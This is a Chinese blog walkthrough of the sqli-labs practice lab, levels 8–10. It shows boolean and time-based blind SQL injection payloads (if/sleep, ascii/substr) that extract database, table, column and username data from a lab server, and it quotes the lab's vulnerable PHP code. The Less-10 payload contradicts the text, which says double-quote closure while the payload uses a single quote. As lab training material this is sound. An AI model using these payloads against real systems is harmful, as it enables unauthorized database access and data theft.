sqllibs-Less08-10

最新推荐文章于 2024-03-18 09:04:17 发布
最新推荐文章于 2024-03-18 09:04:17 发布
阅读量346 收藏
点赞数
分类专栏: # Sqllibs_master
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901038/article/details/107300445
版权

文章目录

8.Less-08 Blind-Boolian-Single

8.1、报错尝试

输入如下试错语句

http://192.168.10.208:8081/sqli-labs-master/Less-8/?id=1’ 【单引号,错误】
http://192.168.10.208:8081/sqli-labs-master/Less-8/?id=1’%23 【单引号+注释,正常】
http://192.168.10.208:8081/sqli-labs-master/Less-8/?id=1" 【双引号,正常】

从上面的语句可以发现,这个闭合方式可能就是单引号闭合,页面类似于less05,但是

如下,从源码我们可以发现,在第五关的时候,会输出数据库产生的错误,但是在第八关的时候并不会输出。
在这里插入图片描述

但是less05也会报数据库的错误,但是这一关不会,因此,这一关的报错注入就不能使用了,所以需要使用延时注入进行盲注。如下,为用利用floor()进行报错注入,由于报错,我们可以发现,第八关无显示,但是第五关将报错信息显示出来了同时也执行了select user()语句。

http://192.168.10.208:8081/sqli-labs-master/Less-8/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

第八关输出结果:
在这里插入图片描述
第五关输出结果:
在这里插入图片描述

因此这一关主要是用if-sleep() 延时注入,payload参见第五关的payload。
sqllibs-Less05-06盲注方法拓展

8.2、代码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}
}

9、Less-09 Blind-Time Based-Single盲注payload详解

9.1、数据获取

从本关的题目可见,这关的是基于时间单引号的,即闭合方式可能及时单引号闭合。

关于闭合方式,我进行语句试错的时候发现单引号、双引号、括号啥的全部都是正常显示,,然后开始有点迷了。。。

9.1.1、猜测数据库

如果显示正确,那么将会快速加载页面,否则将会执行sleep(5),即睡眠5秒钟。
通过ascii(substr(database(),1,1)) = 115不断地去猜解数据库的长度以及每一个字母构成。第一位字母是s(ascii码是115)

http://192.168.10.208:8081/sqli-labs-master/Less-9/?id = 1' and if(ascii(substr(database(),1,1)) = 115,1,sleep(5))--+

在这里插入图片描述
二分法不断猜解,我们可以知道数据库名字是security。

9.1.2、猜测数据库security的数据表

第一张表的第一位是e(ascii码是101)。

http://192.168.10.208:8081/sqli-labs-master/Less-9/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+

二分法不断猜解,我们可以知道security数据库中的数据表emails,referers,uagents,users。

9.1.3、猜测数据表users表的列

http://192.168.10.208:8081/sqli-labs-master/Less-9/?id=1'and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))--+

我们可以知道users表的第一列的第一个字母是i,以此类推,我们可以得到列名是id,username,password。

9.1.4、猜测username的值

http://192.168.10.208:8081/sqli-labs-master/Less-9/?id=1'and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))--+

猜测usernaem第一行的第一位,以此类推,得到数据库的所有内容。

9.2、代码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}
}

10.Less-10 Blind-Time Based-Double

从标题就可以看出,这一关是基于时间双引号,即很明显的这关的闭合方式是双引号闭合,其余的类似于第九关,只需要将单引号变为双引号。

给出一个猜测数据库的payload,其余的参见第九关。

http://192.168.10.208:8081/sqli-labs-master/Less-10/?id= 1' and if(ascii(substr(database(),1,1)) = 115,1,sleep(5))--+
xor0ne_10_01
关注
专栏目录
sqli-labs Less-8(布尔盲注)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 626
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
sqli-libs------less1-less8
qq_46116117的博客
01-05 2454
sqli-libs sql注入思路 判读是否存在注入–判断注入类型–猜解字段数–查看输出字段位置–尝试爆出数据 获取数据库名–获取表名–获取列名–获取数据 less–1 页面让我们输入一个id值 我们用get的请求方式输入看看 测试这里是否有注入点 ?id=1' 出现报错情况,说明这里有注入点 判断注入类型 ?id=1' and 1=1--+ 为正常页面 ?id=1' and 1=2--+ 页面显示不正常 则为,字符型注入 猜测他的查询语句为 select *from * where ID=
SQL-libs Less-8
AgonYAN的博客
07-11 393
SQL-libs Less-8
sql-libs——less8
bronze_s的博客
10-25 284
http://192.168.31.164:9002/Less-8/?id=1' 加'不再显示“you are in” http://192.168.31.164:9002/Less-8/?id=1'--+ 加'--+显示正常 http://192.168.31.164:9002/Less-8/?id=1' and sleep(5)--+ 加入and sleep(5)发现延迟5s说明存在SQL注入漏洞 http://192.168.31.164:9002/Less-8/?id=1' and if
Sqli-labs less 8
weixin_34347651的博客
08-11 355
Less-8 经过简单的测试,我们发现 'or 1=1--+返回正常,那么我们就基本知道应该怎么使用了,参考less5.这里简单的进行一个示例: http://127.0.0.1/sqllib/Less-8/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+ 这里用的延时注入,当然了我们使用布尔类型的注入...
sql-lib-Less2-4
originalSinLow的博客
07-28 218
知识点总结: 16进制 : 0x3a %20 空格 order by判断字段数 利用union select 联合查询(默认只会返回第一个结果,所以改为0用于爆破),获取表名,group_concat()连接字符串 0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ 查询字段名 0’ union select 1,gro
手工和burp两种方式的布尔盲注及Sqli-labs Less 8
信安小菜鸡的博客
04-29 624
布尔盲注 开发人员屏蔽了报错信息,只返回真假的两种情况能够进行布尔盲注 布尔盲注的关键点在于将表达式结果与已知值进行对比,根据对比结果判断正确与否 布尔盲注的判断方式 通过长度判断 length():length(database())>=x 通过字符判断 substr():substr(database(),1,1) =‘s’ 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x Sqli-labs Less 8实践 判断数据库名长度 此处采
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 846
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sqlilabs Less-18
Light_inthe_eyes的博客
03-07 4529
进入页面后,页面有提醒IP ADDRESS,如果对http比较熟悉的话,可以联想到http中的referer、XFF、useragent,在注入中,也可以叫异常Method注入。 用burpsuite抓包,查看请求头中的信息,发现回显了user-agent的信息,猜测此题的注入点在user-agent在user-agent中加入单引号,证实注入点位置的猜测: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/201001
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 833
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sql_lib.zip
05-03
Flink SQL Client操作kafka、es、mysql时所需的jar文件,下载后放在flink目录下,在启动Flink SQL Client时通过-l参数指定
sqlilabs—less8
一个普普通通的博客
03-24 825
sqlilabs—less8
sqli-labs:第八关
J_linnb的博客
05-02 913
使用二分法查找,小于110时不存在,小于120时存在,然后依次查找当猜到115时正常。由于得知数据库结果,根据前几关可得知,第四个表是我们想要的,猜解第四个表长度。依次猜解第二个、三个...到第八个字母,最终为'security'猜测是关闭了报错,根据正确和错误的回显不同,可以使用布尔盲注。根据之前二分法,得知表名为第一个值为117对应的为'u'猜解到8时正常显示,判断数据库名长度为8。猜解到5正常回显,因此第四个表长度为5。等于115时正常,第一个字母为's'以此类推,最后表名为'users'
sqli注入详解——>sqli-labs less-1~65
最新发布
qq_51780583的博客
03-18 1494
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
sqli-labs 第八关 较详细通关解释】
m0_71635484的博客
02-17 943
sqli-labs第八关详解
SQLI-libs 1-8
qq_43871200的博客
03-20 331
前几天看到同学在群里发的sqli-libs教程,想着在家闲着也是无聊,不如搞点事情,于是按照教程下载了phpstudy和sqli-libs,学习一波 第一二三关没什么好说的,总结 查库名:select schema_name from information_schema.schemata 查表名:select table_name from information_schema.tables ...
sql-libs(5)
weixin_30352191的博客
08-13 220
直接只用floor报错注入 或者 update即可 转载于:https://www.cnblogs.com/kuaile1314/p/11345399.html
sqli-libs系列
qq_43511094的博客
12-31 1708
sqllibs information_schema中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件 information_schema库中常用的表 schemate 这个表就很强,可以显示所有数据库的信息,注意,是数据库,不是表,show databases 就是从这个表中获取数据,schema_name就
sql-lib-10-time based -double多线程队列脚本(只针对爆库)
weixin_41860012的博客
02-24 228
参照ichunqiu的ADO老师的代码思路写了一个只爆库的例子 import requests import time import queue import threading import re result='' class DoRun(threading.Thread): def __init__(self,que): threading.Thread.__init__(self) self._queue=que def run(self):
miniprogram-ts-less-quickstart
09-16
miniprogram-ts-less-quickstart是一个用于快速启动小程序开发的项目模板。它结合了TypeScript和Less两种前端技术,能够提供更好的开发体验和代码质量。 首先,TypeScript是JavaScript的超集,它增加了强类型、接口...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值